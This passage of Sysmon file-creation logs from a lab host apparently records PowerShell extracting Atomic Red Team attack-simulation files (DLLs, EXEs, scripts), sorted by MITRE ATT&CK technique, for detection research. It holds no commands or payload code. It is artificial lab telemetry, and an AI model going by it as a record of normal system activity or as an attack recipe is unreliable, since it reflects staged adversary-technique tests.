06:55:12.571","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\T1218.005.hta","CreationUtcTime":"2020-08-01 06:55:12.571","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.571\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\powershell.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.571","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.571","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\powershell.ps1","CreationUtcTime":"2020-08-01 06:55:12.571","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.602\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.007\\src\\x64\\T1218.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.602","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.602","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.007\\src\\x64\\T1218.dll","CreationUtcTime":"2020-08-01 06:55:12.602","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.602\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.008\\src\\Win32\\T1218-2.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.602","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.602","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.008\\src\\Win32\\T1218-2.dll","CreationUtcTime":"2020-08-01 06:55:12.602","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.618\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx64.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.618","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.618","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx64.dll","CreationUtcTime":"2020-08-01 06:55:12.618","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.618\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx86.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.618","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.618","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.010\\bin\\AllTheThingsx86.dll","CreationUtcTime":"2020-08-01 06:55:12.618","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.649\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.649","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.649","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","CreationUtcTime":"2020-08-01 06:55:12.649","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.649\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.649","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.649","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\Win32\\T1218.dll","CreationUtcTime":"2020-08-01 06:55:12.649","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.665\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\x64\\T1218.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.665","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.665","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218\\src\\x64\\T1218.dll","CreationUtcTime":"2020-08-01 06:55:12.665","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:12.759\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1543.003\\bin\\AtomicService.exe\r\nCreationUtcTime: 2020-08-01 06:55:12.759","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:12.759","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1543.003\\bin\\AtomicService.exe","CreationUtcTime":"2020-08-01 06:55:12.759","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.805\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.805","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.805","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010.dll","CreationUtcTime":"2020-08-01 06:55:12.805","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.805\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010x86.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.805","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.805","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.010\\bin\\T1546.010x86.dll","CreationUtcTime":"2020-08-01 06:55:12.805","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.821\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.821","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.821","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.dll","CreationUtcTime":"2020-08-01 06:55:12.821","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:12.821\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.exe\r\nCreationUtcTime: 2020-08-01 06:55:12.821","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:12.821","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.exe","CreationUtcTime":"2020-08-01 06:55:12.821","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.852\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\bin\\T1546.015x64.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.852","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.852","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\bin\\T1546.015x64.dll","CreationUtcTime":"2020-08-01 06:55:12.852","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.852\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad.sln\r\nCreationUtcTime: 2020-08-01 06:55:12.852","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.852","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad.sln","CreationUtcTime":"2020-08-01 06:55:12.852","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.852\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad\\atomicNotepad.vcxproj\r\nCreationUtcTime: 2020-08-01 06:55:12.852","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.852","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad\\atomicNotepad.vcxproj","CreationUtcTime":"2020-08-01 06:55:12.852","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.868\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\x64\\Release\\atomicNotepad.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.868","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.868","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\x64\\Release\\atomicNotepad.dll","CreationUtcTime":"2020-08-01 06:55:12.868","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.868\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\batstartup.bat\r\nCreationUtcTime: 2020-08-01 06:55:12.868","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.868","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\batstartup.bat","CreationUtcTime":"2020-08-01 06:55:12.868","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
